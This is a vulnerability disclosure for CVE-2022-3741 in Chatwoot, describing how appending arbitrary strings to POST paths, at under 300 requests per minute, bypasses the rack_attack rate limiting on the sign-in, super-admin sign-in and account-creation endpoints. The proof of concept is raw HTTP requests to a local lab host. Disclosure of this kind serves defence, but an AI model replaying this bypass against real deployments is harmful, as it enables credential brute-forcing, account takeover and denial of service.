Headline
CVE-2022-3741: Chatwoot's Misconfigured Rack_Attack.rb Does Not Appropriately Protect Against Brute Force Attacks in chatwoot
Impact varies for each individual vulnerability in the application. For generation of accounts, it may be possible, depending on the amount of system resources available, to create a DoS event in the server. These accounts still need to be activated; however, it is possible to identify the output Status Code to separate accounts that are generated and waiting for email verification. \n\nFor the sign in directories, it is possible to brute force login attempts to either login portal, which could lead to account compromise.
Description
Chatwoot relies on the rack_attack.rb file to defend the application against various brute force attacks. The Chatwoot application fails to prevent brute force attacks against the listed paths when strings are appended to the end of POST directory names. Some protection still exists, primarily where more than 300 requests are made in a minute, which appears to be a default rule for the application and configuration. Provided an attacker keeps attacks within 300 per minute it is possible to bypass the configured rules.
The vulnerability was discovered in all tested directories, including:
– /auth/sign_in.json
– /api/v1/accounts.json
– /super_admin/sign_in.json
As I cannot configure the environment to test the other parameters, I am unsure if they are vulnerable, however the directories do accept random strings appended to the end. NOTE - Any arbitrary add on to the end of the directory can bypass the restrictions.
Note that I have tested a possible fix for the issue locally by modifying existing rack_attack rules.
Proof of Concept
POST /auth/sign_in.json HTTP/1.1
Host: 192.168.1.3:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.3:3000/app/login
Content-Type: application/json
Content-Length: 74
Origin: http://192.168.1.3:3000
DNT: 1
Connection: close
Cookie: _chatwoot_session=isHDBFZBkWRHKTcjNmQPFlXVrtaswMNx7FNWeWpiULOnK%2FQakqLzHkfvY33zDMNhewz%2FBgh6VeEqUYoj3a6UA1HjD9WcQW3M0m2pM5N9Jmv88sSRp%2BiEA9dOAP9rhF3WHOIzL%2FI1BA0yWrYOMVZs6IpkAPD%2Fm3kz9E27rxzJ9%2B5fESTBmcJ0LEMT1nB8DvVRj8ULgac0RrjJOjEwySniIbg7HMOKNfP5PeF3FoodUKrhFZE%2F3SReiAt7q2FlHKVVzlwjTdjcz1sYcDTkblkVPRAFt1tYvV6oCA%3D%3D--flwWFZDdAvtdfTYe--tihOFN%2Bg9HKViJZPwD27jQ%3D%3D; user.id=eyJfcmFpbHMiOnsibWVzc2FnZSI6Ik1RPT0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS51c2VyLmlkIn19--d46f4e34d21234bf149d8e35067adec84d9de555; user.expires_at=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqSXdNakl0TURZdE1UQlVNakE2TWprNk1qZ3VORGszV2lJPSIsImV4cCI6bnVsbCwicHVyIjoiY29va2llLnVzZXIuZXhwaXJlc19hdCJ9fQ%3D%3D--d6b05039464d992e99ff7641408f22cb998b6899
{"email":"[email protected]","password":"Password123!","sso_auth_token":""}
POST /super_admin/sign_in.json HTTP/1.1
Host: 192.168.1.3:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.3:3000/super_admin/sign_in
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Origin: http://192.168.1.3:3000
DNT: 1
Connection: close
Cookie: _chatwoot_session=1eo0NEleyD9vD3SZGSC5fmQ8%2FqjqauSZabHRTb79DXjlOr4U8zLfpx%2BWEarESorlTjxkoyywq1dQuYez%2BflouTKpf1kCnbrgpQUO0Ejxp2WcS4eX1xfvCwTmQ6mC3FplGhEhGxMYFiyUycwvh7%2Ba5gsmDLSlyNmLBQX%2FdzZY4VSgqJOvP2ttep5hMRorsoSsqBW4z8Sf6u5rCRGJxpMxCS2rL%2BgzCNpurXoswGmIVZ5soMtONk9x7wt42fynVbd2v5ukPwmf%2B%2BneGCXv6QUOI2TbXF7wC18NtKNjtEekVAP2kX8ZkyIS%2B%2FadCrtVcFVg6N4ZLwf7OK2VTiXuHynATmNbjQ2XFUhA0nH7b9yweJ8fGRpUfSv0E8Qpl%2F6r1uQCgdsVTx%2BXjtTpi0gVAIV%2F2%2BqDSzxQmD%2BR5AJQ7KZGnpYFNVYA1Nhje6i8zCwYzd9fTCTjd%2Bh2NZ4tvN6kpQ%3D%3D--7VQsNUvJAAZPOI0f--W7uERdZvn2dJqbk%2FLiftLg%3D%3D; user.id=eyJfcmFpbHMiOnsibWVzc2FnZSI6Ik1RPT0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS51c2VyLmlkIn19--d46f4e34d21234bf149d8e35067adec84d9de555; user.expires_at=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqSXdNakl0TURZdE1UQlVNakE2TWprNk1qZ3VORGszV2lJPSIsImV4cCI6bnVsbCwicHVyIjoiY29va2llLnVzZXIuZXhwaXJlc19hdCJ9fQ%3D%3D--d6b05039464d992e99ff7641408f22cb998b6899; cw_d_session_info={%22access-token%22:%225KrfuMPZEbhzLOJ6cgSUdA%22%2C%22cache-control%22:%22max-age=0%2C%20private%2C%20must-revalidate%22%2C%22client%22:%22FyV_LCCm8MdrctlhgnT6Tg%22%2C%22connection%22:%22close%22%2C%22content-length%22:%22595%22%2C%22content-type%22:%22application/json%3B%20charset=utf-8%22%2C%22etag%22:%22W/%5C%227dd1dcb51fcc95eae77b2ec9c6ad96ce%5C%22%22%2C%22expiry%22:%221660161568%22%2C%22referrer-policy%22:%22strict-origin-when-cross-origin%22%2C%22token-type%22:%22Bearer%22%2C%22uid%22:%[email protected]%22%2C%22x-content-type-options%22:%22nosniff%22%2C%22x-download-options%22:%22noopen%22%2C%22x-frame-options%22:%22SAMEORIGIN%22%2C%22x-permitted-cross-domain-policies%22:%22none%22%2C%22x-request-id%22:%22b90b4747-6fea-44e2-a677-ebe87930ab16%22%2C%22x-runtime%22:%220.249821%22%2C%22x-xss-protection%22:%221%3B%20mode=block%22}
Upgrade-Insecure-Requests: 1
authenticity_token=WWh5xWO3jgXwVKZb3zWM94qL52osMpbCpFFeuxRsdlgb%2B7OtMdtb%2F4FjNpY68ZA4Q67TDc0iV6OsDsS5O4d8OQ%3D%3D&super_admin%5Bemail%5D=JOANNE%40mayorsec%2ecom&super_admin%5Bpassword%5D=Password123%21&super_admin%5Bremember_me%5D=0
POST /api/v1/accounts.json HTTP/1.1
Host: 192.168.1.3:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.3:3000/app/auth/signup
Content-Type: application/json
Content-Length: 144
Origin: http://192.168.1.3:3000
DNT: 1
Connection: close
Cookie: _chatwoot_session=pOArRsb8vDx6%2FpQuywQLE3E0lznJlbGrnqLLNMT9ySqt7YR4eh%2BSdWTMW6dmES79X13k5aCblM30KNbNhw7mCnpqV26eYv2LrM6XrnIu8KDwl3pubsrWEKxO0iM%2F6uUxdnY3J2Qryff78SF8vn7HPkYvS00yyAQ6JFGAcOlUL38tU7C1LxVmlLPo958m47gmGwgYruLnFPn7Rur9Oz6NMTVlmLe2maTpqv4TFB%2FvKc6kP38fZunPGVeRxPwKasUAE4%2BXyUJkb5Z6MXhrqi8PENPlbkQ1dDkFRQ%3D%3D--Cu1By7B2Un6rncH9--wgscGhl5IJUSIrAiD5e0AQ%3D%3D
{"account_name":"KATHRINE","user_full_name":"KATHRINE","email":"[email protected]","password":"Password123!","h_captcha_client_response":""}
Impact
Impact varies for each individual vulnerability in the application. For generation of accounts, it may be possible, depending on the amount of system resources available, to create a DoS event in the server. These accounts still need to be activated; however, it is possible to identify the output Status Code to separate accounts that are generated and waiting for email verification.
For the sign in directories, it is possible to brute force login attempts to either login portal, which could lead to account compromise.
Occurrences
References
- CWE-307 Improper Restriction of Excessive Authentication Attempts
- OWASP OAT-019 Account Creation
- OWASP Top 10 - A2:2017 Broken Authentication